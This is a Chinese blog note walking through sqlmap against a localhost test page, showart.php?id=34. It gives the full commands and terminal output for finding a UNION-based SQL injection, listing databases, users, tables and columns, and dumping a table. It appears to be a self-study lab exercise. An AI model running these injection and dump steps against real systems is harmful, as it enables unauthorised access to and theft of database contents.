sqlmap 小记
sqlmap -u "http://localhost/sqltest/showart.php?id=34" GET
wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" GET
_
___ ___| |_____ ___ ___ {1.0.7.0#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 01:18:27
[01:18:27] [INFO] resuming back-end DBMS 'mysql'
[01:18:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: UNION query
Title: MySQL UNION query (48) - 3 columns
Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:18:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:18:27] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'
[*] shutting down at 01:18:27
wangleileideMacBook-Air:sqltest wangleilei$
复制代码
爆库
sqlmap -u "http://localhost/sqltest/showart.php?id=34" --dbs
wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" --dbs
_
___ ___| |_____ ___ ___ {1.0.7.0#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 01:22:52
[01:22:52] [INFO] resuming back-end DBMS 'mysql'
[01:22:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: UNION query
Title: MySQL UNION query (48) - 3 columns
Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:22:52] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:22:52] [INFO] fetching database names
[01:22:52] [INFO] the SQL query used returns 8 entries
[01:22:52] [INFO] resumed: information_schema
[01:22:52] [INFO] resumed: BYSJ
[01:22:52] [INFO] resumed: YGGL
[01:22:52] [INFO] resumed: ctz
[01:22:52] [INFO] resumed: mysql
[01:22:52] [INFO] resumed: new_schema
[01:22:52] [INFO] resumed: performance_schema
[01:22:52] [INFO] resumed: sys
available databases [8]:
[*] BYSJ
[*] ctz
[*] information_schema
[*] mysql
[*] new_schema
[*] performance_schema
[*] sys
[*] YGGL
[01:22:52] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'
[*] shutting down at 01:22:52
复制代码
爆出数据库有8个库 好恐怖/?,然后我们看看漏洞文件用的哪个数据库
sqlmap -u "http://localhost/sqltest/showart.php?id=34" --current-db
wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" --current-db
_
___ ___| |_____ ___ ___ {1.0.7.0#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 01:25:15
[01:25:15] [INFO] resuming back-end DBMS 'mysql'
[01:25:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: UNION query
Title: MySQL UNION query (48) - 3 columns
Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:25:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:25:16] [INFO] fetching current database
current database: 'ctz'
[01:25:16] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'
[*] shutting down at 01:25:16
复制代码
很明显看到了currentDataBases 为ctz,然后我们看看当前user
sqlmap -u "http://localhost/sqltest/showart.php?id=34" --users
wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" --users
_
___ ___| |_____ ___ ___ {1.0.7.0#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 01:28:02
[01:28:02] [INFO] resuming back-end DBMS 'mysql'
[01:28:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: UNION query
Title: MySQL UNION query (48) - 3 columns
Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:28:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:28:02] [INFO] fetching database users
[01:28:02] [INFO] the SQL query used returns 29 entries
database management system users [2]:
[*] 'mysql.sys'@'localhost'
[*] 'root'@'localhost'
[01:28:02] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'
[*] shutting down at 01:28:02
复制代码
看到了用户是:root
列出当前数据库所有表
sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz --tables
wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz --tables
_
___ ___| |_____ ___ ___ {1.0.7.0#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 01:40:11
[01:40:11] [INFO] resuming back-end DBMS 'mysql'
[01:40:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: UNION query
Title: MySQL UNION query (48) - 3 columns
Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:40:11] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:40:11] [INFO] fetching tables for database: 'ctz'
[01:40:11] [INFO] the SQL query used returns 13 entries
[01:40:11] [INFO] resumed: article
[01:40:11] [INFO] resumed: ys_admin
[01:40:11] [INFO] resumed: ys_cs
[01:40:11] [INFO] resumed: ys_gmjl
[01:40:11] [INFO] resumed: ys_huifu
[01:40:11] [INFO] resumed: ys_rwcs
[01:40:11] [INFO] resumed: ys_rwlb
[01:40:11] [INFO] resumed: ys_txjl
[01:40:11] [INFO] resumed: ys_users
[01:40:11] [INFO] resumed: ys_wxcd
[01:40:11] [INFO] resumed: ys_xtcs
[01:40:11] [INFO] resumed: ys_yjjl
[01:40:11] [INFO] resumed: ys_zjmx
Database: ctz
[13 tables]
+----------+
| article |
| ys_admin |
| ys_cs |
| ys_gmjl |
| ys_huifu |
| ys_rwcs |
| ys_rwlb |
| ys_txjl |
| ys_users |
| ys_wxcd |
| ys_xtcs |
| ys_yjjl |
| ys_zjmx |
+----------+
[01:40:11] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'
[*] shutting down at 01:40:11
复制代码
列出上面查出来的任意一个表的所有列(以ys_rwcs)为例子
sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz -T ys_rwcs --columns
wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz -T ys_rwcs --columns
_
___ ___| |_____ ___ ___ {1.0.7.0#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 01:43:19
[01:43:20] [INFO] resuming back-end DBMS 'mysql'
[01:43:20] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: UNION query
Title: MySQL UNION query (48) - 3 columns
Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:43:20] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:43:20] [INFO] fetching columns for table 'ys_rwcs' in database 'ctz'
[01:43:20] [INFO] the SQL query used returns 8 entries
[01:43:20] [INFO] resumed: "id","int(11)"
[01:43:20] [INFO] resumed: "kqzt","int(11)"
[01:43:20] [INFO] resumed: "scyxsj","int(11)"
[01:43:20] [INFO] resumed: "scid","int(11)"
[01:43:20] [INFO] resumed: "sckjjg","varchar(255)"
[01:43:20] [INFO] resumed: "dqid","int(11)"
[01:43:20] [INFO] resumed: "xtcjsj","int(11)"
[01:43:20] [INFO] resumed: "kjdj","int(11)"
Database: ctz
Table: ys_rwcs
[8 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| dqid | int(11) |
| id | int(11) |
| kjdj | int(11) |
| kqzt | int(11) |
| scid | int(11) |
| sckjjg | varchar(255) |
| scyxsj | int(11) |
| xtcjsj | int(11) |
+--------+--------------+
[01:43:20] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'
[*] shutting down at 01:43:20
复制代码
爆字段内容
sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz -T ys_rwcs "email,name,openid" --dump
wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz -T ys_rwcs "email,name,openid" --dump
_
___ ___| |_____ ___ ___ {1.0.7.0#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 01:48:16
[01:48:16] [INFO] resuming back-end DBMS 'mysql'
[01:48:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: UNION query
Title: MySQL UNION query (48) - 3 columns
Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:48:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:48:16] [INFO] fetching columns for table 'ys_rwcs' in database 'ctz'
[01:48:16] [INFO] the SQL query used returns 8 entries
[01:48:16] [INFO] resumed: "id","int(11)"
[01:48:16] [INFO] resumed: "kqzt","int(11)"
[01:48:16] [INFO] resumed: "scyxsj","int(11)"
[01:48:16] [INFO] resumed: "scid","int(11)"
[01:48:16] [INFO] resumed: "sckjjg","varchar(255)"
[01:48:16] [INFO] resumed: "dqid","int(11)"
[01:48:16] [INFO] resumed: "xtcjsj","int(11)"
[01:48:16] [INFO] resumed: "kjdj","int(11)"
[01:48:16] [INFO] fetching entries for table 'ys_rwcs' in database 'ctz'
[01:48:16] [WARNING] reflective value(s) found and filtering out
[01:48:16] [INFO] the SQL query used returns 1 entries
[01:48:16] [INFO] retrieved: "5940","1","1","0","5939"," ","1488499312","1487...
[01:48:16] [INFO] analyzing table dump for possible password hashes
Database: ctz
Table: ys_rwcs
[1 entry]
+----+------+------+------+------+------------+--------+------------+
| id | dqid | scid | kjdj | kqzt | scyxsj | sckjjg | xtcjsj |
+----+------+------+------+------+------------+--------+------------+
| 1 | 5940 | 5939 | 1 | 0 | 1488499312 | NULL | 1487741441 |
+----+------+------+------+------+------------+--------+------------+
[01:48:16] [INFO] table 'ctz.ys_rwcs' dumped to CSV file '/Users/wangleilei/.sqlmap/output/localhost/dump/ctz/ys_rwcs.csv'
[01:48:16] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'
[*] shutting down at 01:48:16
复制代码